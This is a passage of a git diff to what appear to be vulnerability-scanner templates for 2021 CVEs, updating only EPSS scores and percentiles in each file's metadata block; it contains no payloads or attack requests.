b/http/cves/2021/CVE-2021-21745.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2021-21745 cwe-id: CWE-352 - epss-score: 0.36585 - epss-percentile: 0.96777 + epss-score: 0.42121 + epss-percentile: 0.96978 cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index fa8dd37da0..018ad582e4 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21799 cwe-id: CWE-79 epss-score: 0.83144 - epss-percentile: 0.98126 + epss-percentile: 0.98156 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 0f46afd93e..f48569d977 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-21800 cwe-id: CWE-79 epss-score: 0.83144 - epss-percentile: 0.98126 + epss-percentile: 0.98156 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index fd739617a7..0b2c46835a 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21801 cwe-id: CWE-79 epss-score: 0.83144 - epss-percentile: 0.98126 + epss-percentile: 0.98156 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 58182f6436..99e5f69e7e 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21802 cwe-id: CWE-79 epss-score: 0.83144 - epss-percentile: 0.98126 + epss-percentile: 0.98156 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index d114710d49..6ac87da4f8 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21803 cwe-id: CWE-79 epss-score: 0.83144 - epss-percentile: 0.98126 + epss-percentile: 0.98156 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index dd962b5b44..20502c591d 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21805 cwe-id: CWE-78 epss-score: 0.97374 - epss-percentile: 0.99889 + epss-percentile: 0.99892 cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index 5f21ed004a..8ffac9e5d6 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.00255 - epss-percentile: 0.6322 + epss-percentile: 0.63372 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index f40bec2a17..e540d702b6 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.9 cve-id: CVE-2021-21881 cwe-id: CWE-78 - epss-score: 0.97163 - epss-percentile: 0.99758 + epss-score: 0.9711 + epss-percentile: 0.99739 cpe: cpe:2.3:o:lantronix:premierwave_2050_firmware:8.9.0.0:r4:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 17be68680a..a495c4ca61 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21972 cwe-id: CWE-22 - epss-score: 0.97385 - epss-percentile: 0.99897 + epss-score: 0.97358 + epss-percentile: 0.99884 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index 7a27fed3fa..8d405f2556 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-21973 cwe-id: CWE-918 epss-score: 0.31709 - epss-percentile: 0.96554 + epss-percentile: 0.96582 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index ce9462e06c..c54cb31dbd 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-21975 cwe-id: CWE-918 - epss-score: 0.96595 - epss-percentile: 0.99521 + epss-score: 0.96694 + epss-percentile: 0.99569 cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 98697331a8..9cf457b58a 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21978 cwe-id: CWE-20 - epss-score: 0.97375 - epss-percentile: 0.9989 + epss-score: 0.97364 + epss-percentile: 0.99887 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 2c60db7477..778d0def8b 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-21985 cwe-id: CWE-20 - epss-score: 0.97396 - epss-percentile: 0.99903 + epss-score: 0.9741 + epss-percentile: 0.99919 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index f2f13febee..12815d9441 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22005 cwe-id: CWE-22 - epss-score: 0.97053 - epss-percentile: 0.99699 + epss-score: 0.97289 + epss-percentile: 0.99842 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index a35b03bb8e..a622255f98 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-22053 cwe-id: CWE-94 - epss-score: 0.59407 - epss-percentile: 0.97436 + epss-score: 0.51942 + epss-percentile: 0.97281 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 77fb1d7cd6..d57b7110d7 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-22054 cwe-id: CWE-918 - epss-score: 0.72885 - epss-percentile: 0.9779 + epss-score: 0.74 + epss-percentile: 0.97848 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 9577b017d7..cfee387860 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22122 cwe-id: CWE-79 epss-score: 0.00609 - epss-percentile: 0.7619 + epss-percentile: 0.76286 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 0bff722753..0eb6600150 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-22145 cwe-id: CWE-209 - epss-score: 0.96589 - epss-percentile: 0.9952 + epss-score: 0.96315 + epss-percentile: 0.99434 cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 2219e695a6..6e8eb8a24c 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -22,8 +22,8 @@ info: cvss-score: 10 cve-id: CVE-2021-22205 cwe-id: CWE-94 - epss-score: 0.9729 - epss-percentile: 0.99843 + epss-score: 0.97333 + epss-percentile: 0.99868 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index a5e127c9a6..cbc36a055a 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -24,8 +24,8 @@ info: cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 - epss-score: 0.17367 - epss-percentile: 0.95587 + epss-score: 0.12047 + epss-percentile: 0.94831 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 5932a81869..d274b4581b 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-22502 cwe-id: CWE-78 epss-score: 0.96129 - epss-percentile: 0.99362 + epss-percentile: 0.99379 cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 29bb11b059..df55922aca 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22707 cwe-id: CWE-798 - epss-score: 0.39636 - epss-percentile: 0.9689 + epss-score: 0.29966 + epss-percentile: 0.96497 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 371a71df39..32792f5a5d 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.81083 + epss-percentile: 0.81159 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 535d28419f..b5d804fcac 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22911 cwe-id: CWE-75,NVD-CWE-Other - epss-score: 0.94508 - epss-percentile: 0.99034 + epss-score: 0.95052 + epss-percentile: 0.99134 cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 63507d0b06..563ddee7d0 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-22986 cwe-id: CWE-918 - epss-score: 0.97469 - epss-percentile: 0.99958 + epss-score: 0.97421 + epss-percentile: 0.99924 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 00f554219f..3a1666712b 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-23241 cwe-id: CWE-22 epss-score: 0.00365 - epss-percentile: 0.6935 + epss-percentile: 0.69502 cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index a66a27dc6b..deb44259f1 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 - epss-score: 0.93725 - epss-percentile: 0.98908 + epss-score: 0.94936 + epss-percentile: 0.99118 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 2f5276728f..bd461442e6 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 - epss-score: 0.03578 - epss-percentile: 0.90627 + epss-score: 0.03582 + epss-percentile: 0.90701 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index de95a74c8f..be772b7d0e 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24150 cwe-id: CWE-918 - epss-score: 0.02335 - epss-percentile: 0.88571 + epss-score: 0.02268 + epss-percentile: 0.88473 cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 9c63190fdc..cf26a312b1 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24155 cwe-id: CWE-434 epss-score: 0.95488 - epss-percentile: 0.99212 + epss-percentile: 0.99234 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 83dabbfe1c..ec5e82ddd3 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24165 cwe-id: CWE-601 - epss-score: 0.00121 - epss-percentile: 0.46064 + epss-score: 0.00129 + epss-percentile: 0.47461 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index c7900f5fcb..113b77922b 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24169 cwe-id: CWE-79 - epss-score: 0.00183 - epss-percentile: 0.55429 + epss-score: 0.0021 + epss-percentile: 0.58865 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index e7d59657a6..106227fd76 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24176 cwe-id: CWE-79 epss-score: 0.00136 - epss-percentile: 0.48725 + epss-percentile: 0.4884 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 3e9fa55202..05195f1739 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24210 cwe-id: CWE-601 - epss-score: 0.00121 - epss-percentile: 0.46064 + epss-score: 0.00129 + epss-percentile: 0.47461 cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 98bc98fe23..5d8f990d7c 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00317 - epss-percentile: 0.67073 + epss-percentile: 0.67249 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index ff34e970d1..0625d55de5 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24215 cwe-id: CWE-425,CWE-284 - epss-score: 0.06012 - epss-percentile: 0.92703 + epss-score: 0.06775 + epss-percentile: 0.93187 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 0ca21195d5..8c0d778bf6 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24226 cwe-id: CWE-200 - epss-score: 0.03699 - epss-percentile: 0.90772 + epss-score: 0.03367 + epss-percentile: 0.90437 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 6b5a83d97e..50c2b7d2f8 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24227 cwe-id: CWE-200 - epss-score: 0.03157 - epss-percentile: 0.90072 + epss-score: 0.02872 + epss-percentile: 0.89698 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 5173993f91..ea0dabd91f 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24235 cwe-id: CWE-79 - epss-score: 0.00112 - epss-percentile: 0.4422 + epss-score: 0.00119 + epss-percentile: 0.45855 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index d870649232..d051df816f 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -21,7 +21,7 @@ info: cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.15028 - epss-percentile: 0.95276 + epss-percentile: 0.95292 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 1db715adbd..541f6721fa 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24237 cwe-id: CWE-79 - epss-score: 0.00249 - epss-percentile: 0.62605 + epss-score: 0.00265 + epss-percentile: 0.64088 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 0b6b60d600..543aad7a23 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24239 cwe-id: CWE-79 - epss-score: 0.00121 - epss-percentile: 0.46064 + epss-score: 0.00129 + epss-percentile: 0.47461 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index a0cfb96b93..dd2ef82fcf 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24245 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54722 + epss-percentile: 0.54879 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index 222318b24d..18a85b8fac 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24274 cwe-id: CWE-79 epss-score: 0.00154 - epss-percentile: 0.51557 + epss-percentile: 0.51591 cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 71c5903c12..2a2091a801 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54722 + epss-percentile: 0.54879 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 2b63b0e3cb..0c1998f71e 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54722 + epss-percentile: 0.54879 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index a9b9797f0e..57e849bd66 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-24278 cwe-id: CWE-863 - epss-score: 0.07978 - epss-percentile: 0.93609 + epss-score: 0.06115 + epss-percentile: 0.92804 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index f869a9c83e..287f59392a 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24284 cwe-id: CWE-434 - epss-score: 0.96715 - epss-percentile: 0.9957 + epss-score: 0.9676 + epss-percentile: 0.99595 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 68bd1eb3d1..c602f2ac16 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24285 cwe-id: CWE-89 - epss-score: 0.22212 - epss-percentile: 0.96005 + epss-score: 0.21023 + epss-percentile: 0.95973 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index e1a5ab347f..aecc38b0d8 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54722 + epss-percentile: 0.54879 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 9f911f4459..b25f1063ee 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54722 + epss-percentile: 0.54879 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index df6c9a38f9..a01887c4dd 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24288 cwe-id: CWE-601 - epss-score: 0.0015 - epss-percentile: 0.50986 + epss-score: 0.00129 + epss-percentile: 0.47456 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 13f83867b2..34f64495ac 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-24291 cwe-id: CWE-79 - epss-score: 0.00085 - epss-percentile: 0.35456 + epss-score: 0.00084 + epss-percentile: 0.34815 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index f9dc597841..0bf9b2f86f 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-24298 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.4508 + epss-percentile: 0.45185 cpe: 